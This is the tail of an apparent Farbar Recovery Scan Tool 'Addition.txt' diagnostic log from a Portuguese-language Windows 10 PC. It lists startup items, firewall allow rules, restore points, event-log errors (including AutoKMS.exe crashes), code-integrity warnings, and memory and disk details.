HKLM\...\StartupApproved\StartupFolder: => "Inicialização Rápida do Solidworks 2014.lnk" HKLM\...\StartupApproved\StartupFolder: => "Aplicativo de Download Automático do SolidWorks.lnk" HKLM\...\StartupApproved\Run: => "ETDCtrl" HKLM\...\StartupApproved\Run32: => "ADSKAppManager" HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\StartupApproved\Run: => "Skype" HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\StartupApproved\Run: => "Akamai NetSession Interface" ==================== Regras do Firewall (Whitelisted) =============== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{C47E57DA-4191-4DA0-AF2E-5614AF4B317E}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{5FA1C321-9B8C-45DE-9FCC-2AC160A7F0EC}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [UDP Query User{CA035A35-4CA8-40C4-995D-14EBC95741EA}C:\program files (x86)\maxthon\bin\maxthon.exe] => (Allow) C:\program files (x86)\maxthon\bin\maxthon.exe FirewallRules: [TCP Query User{A7B9B130-B253-4C0C-AAB6-7007B90B6488}C:\program files (x86)\maxthon\bin\maxthon.exe] => (Allow) C:\program files (x86)\maxthon\bin\maxthon.exe FirewallRules: [{857723D4-D111-43A0-A9A8-96DA5254998B}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe FirewallRules: [{07A3E502-0A97-4DAE-945E-1927DCB9FA39}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{743D21E4-0A91-4646-B76B-E712FCA230DA}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{5EE15CE9-B687-4327-B389-2C0CF704A17D}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{030E56DF-B24A-41C9-9D8C-35B6B56EE5F5}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{6C122131-E5E3-4FE9-BC42-7E3AA4EE1CEA}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{01A6F848-B1FF-4E91-93CF-8E3A135E0071}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [UDP Query User{C7B0C57C-9C4A-42C7-908F-CFC21BE7DD72}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe FirewallRules: [TCP Query User{E55B8EA0-80E5-4845-858D-794D5224590E}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe FirewallRules: [{6B80180A-5FA5-4F04-BF41-5DDF45D5FD84}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{4ACD1FD1-578D-4F9F-A953-BF7F7A00EDBB}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{B085A7C4-CA3C-49E7-BFFC-FA3ADD9AF076}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{0BBCDC32-B883-4956-9C26-59EA61133C17}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [UDP Query User{5FB426E9-B8DD-45B9-A10B-D439250E2BD8}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe FirewallRules: [TCP Query User{8EB802BA-99D9-4C30-B9A4-F030CDE32B0A}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe FirewallRules: [UDP Query User{8369AC53-5EC9-42B5-85DE-040CF0FC44E4}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [TCP Query User{45065BD2-D8A8-472E-AC45-EC93EFA5AF03}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [UDP Query User{43CB3289-3FB5-4193-B8CD-CB807DBEB200}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [TCP Query User{E5C37137-4421-43F0-9016-13E9AA351090}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [{3A5BA617-E2A4-4CFE-834D-53E1954103B1}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{32B11E99-46AE-4DA1-9AB5-73826512DDC1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{03E0815D-45CD-42BF-8BC5-F581D787A231}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{7048C7F2-37AD-4A33-82C5-4EFF3CD87651}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{3BE8B9FC-FBEE-4413-B91B-CAF15FCEE4E9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{781EA6A4-4F09-4DC5-A1A8-4A81A412164D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe FirewallRules: [{1EFD8FA6-33F3-4E2B-BE8E-D51155A99605}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe FirewallRules: [{B916BF38-0541-4C51-917D-B61ED25E2E82}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{2BC9CF4F-7C4B-460A-AB88-2C4C64FC64A1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{E4ACB405-DDE3-4ACD-B2B3-48E67CB66A68}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe FirewallRules: [{B180E70D-0C76-4259-8E36-D24FA5192F35}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{C54B1C61-C082-482B-A98D-FD503942B19E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{DB1BC2C2-BC75-4FF4-AAF2-B41BCA871708}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{E7AD6073-5D36-4C53-A55D-790E9BC1512E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe FirewallRules: [{3C780E9F-A5D2-4F41-BBBD-4C14A80A65B3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe FirewallRules: [{617F487A-4693-4296-8628-3B65B6F8AF24}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{BA9BD23C-5620-45B5-B83C-CA095F8E0577}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{FCC6378D-3124-4158-8D4F-F644588DA149}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{DDD5220C-7CA5-4902-BF93-CCE3CC5D2789}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{D0EED423-A5B8-4815-B230-F23A5D40F02D}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe FirewallRules: [{F6C3E009-3BB8-46E9-B37E-0C042C38D52E}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe FirewallRules: [{5D684EE8-78F3-4F95-B3CB-36EEB2A16901}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{1F719180-3821-4E68-BBB9-A167D27F1B73}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{B15F9B45-4153-4B41-BF1E-B8F405894728}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{746F54FD-1C70-4B20-AEDA-E8AEE4068243}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{C9F70E75-5BE8-44FC-8965-A4951DB0A865}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{D4D82735-F642-4D0C-A422-8E14C4FB72C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{C18CB6CE-94F9-46DD-ACF5-0741F3063B83}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{0FDF9E73-9EDE-46C9-BA1E-A34462554A69}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{8D2B2992-E994-4C57-AB32-F0F64E58AB73}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{1BDF3E28-BB2B-4BF2-AB37-70CA5913E636}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [TCP Query User{25374537-EBC8-40A4-AB9F-92DA2E5A6BA0}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{53A16881-8BED-46AB-B5B8-73126B5D2767}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [{58A4089F-B65C-421A-BA9B-A09F8E370DBE}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{9CBA0D4B-A02C-4C3C-AE16-F3060F06E85A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{C20E5AB6-8116-4A34-B3B2-30106D2F9394}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{2F28AC03-D7C2-4045-8C0B-AF6E352BF2F2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{56AFD569-3AE9-4840-8FF2-B92C7F938D4D}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe FirewallRules: [{52EB445D-A0AF-47FC-B168-A4CF3D4CF9B0}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe FirewallRules: [{3E869D92-6DFC-49E8-B3D7-83F0BE93B9BD}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe FirewallRules: [{7A9A62DF-48BC-4DC6-B130-A6DFF39D4150}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe FirewallRules: [{4D7511F6-10B8-4443-8546-633E2F17CEF9}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe FirewallRules: [{F126518A-F0DE-4EE0-A5BB-7D2948B4B0A8}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe FirewallRules: [{408545C6-CE6A-4A8D-B616-FA8B84D0DE3C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{A803E33F-9845-436F-AB9C-7CAADBB43873}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{A18FECE9-799F-4F3D-AF13-5747104432BC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{8FBE25F7-7064-4F78-8026-21728E1B6931}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{A69523AD-66DB-4749-833D-171B1F149D2B}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{AAF4F598-2A65-4C84-94B3-D31F268FC3DF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [TCP Query User{E6B4284E-E1E6-4117-A7B8-2F451FA0F332}C:\program files (x86)\common files\nokia\fuse\fuseservice.exe] => (Allow) C:\program files (x86)\common files\nokia\fuse\fuseservice.exe FirewallRules: [UDP Query User{8659FB35-FAD8-48F6-9E89-6628830A2B3F}C:\program files (x86)\common files\nokia\fuse\fuseservice.exe] => (Allow) C:\program files (x86)\common files\nokia\fuse\fuseservice.exe FirewallRules: [TCP Query User{01EDDB8F-3911-40A7-BBAB-A5153FE880C9}C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe] => (Allow) C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe FirewallRules: [UDP Query User{E5AFAB87-4930-4594-81F5-A61E80E43CD5}C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe] => (Allow) C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe FirewallRules: [TCP Query User{ED7F16AA-3C35-42D9-AA01-F3A5AE450616}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe FirewallRules: [UDP Query User{2C41E6EA-2E9D-4382-9110-DF9BE5CD4D19}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe FirewallRules: [TCP Query User{158EEE99-E8E9-4FFB-A402-72707D11D8CC}C:\users\gabri\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\utorrent.exe FirewallRules: [UDP Query User{E1873135-FEEB-447E-A0BD-0ADCF2BD4BFF}C:\users\gabri\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\utorrent.exe FirewallRules: [TCP Query User{561F5DF3-5150-41AA-B2D7-AEF1EE1356C9}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe FirewallRules: [UDP Query User{6D650BA7-A479-4A43-83C7-2DC52C346FD1}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe FirewallRules: [{4535C5E7-DC5F-4C7B-8402-54A6DEF7BE1E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{786A8CC9-852C-4003-9B09-7DF1EC4CD96B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{1C9E9DEF-C471-4940-8973-4789DBB1FE76}] => (Allow) C:\Program Files (x86)\Mr DJ\Fallout New Vegas Ultimate Edition\FalloutNVLauncher.exe FirewallRules: [{D943BFCE-CB3F-4CDF-8BE5-A2BA9E091A78}] => (Allow) C:\Program Files (x86)\Mr DJ\Fallout New Vegas Ultimate Edition\FalloutNVLauncher.exe FirewallRules: [TCP Query User{589DDBFF-6D69-431B-BF71-53E2DBF2027C}C:\games\counter-strike global offensive\csgo.exe] => (Allow) C:\games\counter-strike global offensive\csgo.exe FirewallRules: [UDP Query User{F4E9A1BD-B760-44D5-BA7E-CB9D4C6AABFB}C:\games\counter-strike global offensive\csgo.exe] => (Allow) C:\games\counter-strike global offensive\csgo.exe ==================== Pontos de Restauração ========================= 24-08-2016 23:13:49 Windows Update 31-08-2016 07:03:18 Windows Update 02-09-2016 20:13:51 Removed Importação do SketchUp 2016. ==================== Dispositivos Apresentando Falhas No Gerenciador ============= ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (09/04/2016 07:09:26 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 24d8 Start Time: 01d206f8f3876da8 Termination Time: 12 Application Path: C:\Windows\System32\rundll32.exe Report Id: 3d1b2d4c-72ec-11e6-9c61-dc0ea101143d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 07:09:04 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 263c Start Time: 01d206f8ed306ac1 Termination Time: 15 Application Path: C:\Windows\System32\rundll32.exe Report Id: 2f9eaf01-72ec-11e6-9c61-dc0ea101143d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 07:08:51 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 243c Start Time: 01d206f8d4da332b Termination Time: 2 Application Path: C:\Windows\System32\rundll32.exe Report Id: 28256b72-72ec-11e6-9c61-dc0ea101143d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 03:15:55 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: AutoKMS.exe, version: 2.5.0.0, time stamp: 0x52aef33f Faulting module name: KERNELBASE.dll, version: 10.0.14393.0, time stamp: 0x57899809 Exception code: 0xe0434352 Fault offset: 0x0000000000017788 Faulting process id: 0x6b0 Faulting application start time: 0x01d206d77788daa1 Faulting application path: C:\WINDOWS\AutoKMS\AutoKMS.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: 6c655229-b962-44ed-b13a-21baddb2124d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 03:15:54 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Aplicativo: AutoKMS.exe Versão do Framework: v4.0.30319 Descrição: O processo foi terminado devido a uma exceção sem tratamento. Informações da Exceção: System.ArgumentException em System.IO.FileStream..ctor(Microsoft.Win32.SafeHandles.SafeFileHandle, System.IO.FileAccess, Int32, Boolean) em ..() em System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) em System.Threading.ThreadHelper.ThreadStart() Error: (09/04/2016 03:10:32 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64 Faulting module name: ntdll.dll, version: 10.0.14393.103, time stamp: 0x57b7e207 Exception code: 0xc0000005 Fault offset: 0x000000000003061d Faulting process id: 0x9c0 Faulting application start time: 0x01d206d799fc7d00 Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll Report Id: aa68b49f-a14d-46e8-8274-82a7dbe69ad5 Faulting package full name: Faulting package-relative application ID: Error: (09/03/2016 06:57:42 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-G8E168K) Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023673 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (09/03/2016 06:57:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-G8E168K) Description: Activation of app Microsoft.LockApp_cw5n1h2txyewy!WindowsDefaultLockScreen failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (09/03/2016 06:57:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: DESKTOP-G8E168K) Description: App Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy+WindowsDefaultLockScreen did not launch within its allotted time. Error: (09/03/2016 06:28:34 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: AutoKMS.exe, version: 2.5.0.0, time stamp: 0x52aef33f Faulting module name: KERNELBASE.dll, version: 10.0.14393.0, time stamp: 0x57899809 Exception code: 0xe0434352 Fault offset: 0x0000000000017788 Faulting process id: 0x1794 Faulting application start time: 0x01d20611b4f451ca Faulting application path: C:\WINDOWS\AutoKMS\AutoKMS.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: c8a57f1d-3838-4bce-9dd7-460afef68178 Faulting package full name: Faulting package-relative application ID: Erros de Sistema: ============= Error: (09/04/2016 07:16:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-G8E168K) Description: The server Cortana.ActionUris.ActionUri did not register with DCOM within the required timeout. Error: (09/04/2016 07:15:19 PM) (Source: Microsoft-Windows-NDIS) (EventID: 10317) (User: AUTORIDADE NT) Description: Miniport TAP-Windows Adapter V9 #3, {697C671E-F8A8-42A0-86E2-9A82F6FD67A4}, had event 76 Error: (09/04/2016 07:11:54 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT) Description: The específico do aplicativo permission settings do not grant Local Ativação permission for the COM Server application with CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} and APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} to the user AUTORIDADE NT\SISTEMA SID (S-1-5-18) from address LocalHost (Usando LRPC) running in the application container Não Disponível SID (Não Disponível). This security permission can be modified using the Component Services administrative tool. Error: (09/04/2016 07:06:55 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 8 0x0 0x0 Error: (09/04/2016 07:06:53 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 2 0xdeaddeed 0xeeec Error: (09/04/2016 07:06:53 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 1 0xc 0x4 Error: (09/04/2016 06:27:39 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT) Description: The específico do aplicativo permission settings do not grant Local Ativação permission for the COM Server application with CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} and APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} to the user AUTORIDADE NT\SISTEMA SID (S-1-5-18) from address LocalHost (Usando LRPC) running in the application container Não Disponível SID (Não Disponível). This security permission can be modified using the Component Services administrative tool. Error: (09/04/2016 05:20:44 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 8 0x0 0x0 Error: (09/04/2016 05:20:41 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 2 0xdeaddeed 0xeeec Error: (09/04/2016 05:20:41 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 1 0xc 0x4 CodeIntegrity: =================================== Date: 2016-09-03 22:03:20.241 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvami.inf_amd64_fd2cdd92cf7ee187\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-09-03 22:03:19.712 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-09-02 23:26:16.076 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements. Date: 2016-09-02 23:26:16.076 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements. Date: 2016-09-02 23:26:16.076 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements. Date: 2016-09-02 23:26:16.076 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements. Date: 2016-09-02 23:26:16.076 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements. Date: 2016-09-02 23:26:16.076 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements. Date: 2016-09-02 22:12:25.544 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-09-02 22:12:25.330 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Informações da Memória =========================== Processador: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz Percentagem de memória em uso: 32% RAM física total: 8069.53 MB RAM física disponível: 5454.95 MB Virtual Total: 9349.53 MB Virtual disponível: 6780.58 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:697.92 GB) (Free:471.71 GB) NTFS ==================== MBR & Tabela de Partições ================== ======================================================== Disk: 0 (Size: 698.6 GB) (Disk ID: 7AB4F75A) Partition: GPT. ==================== Fim de Addition.txt ============================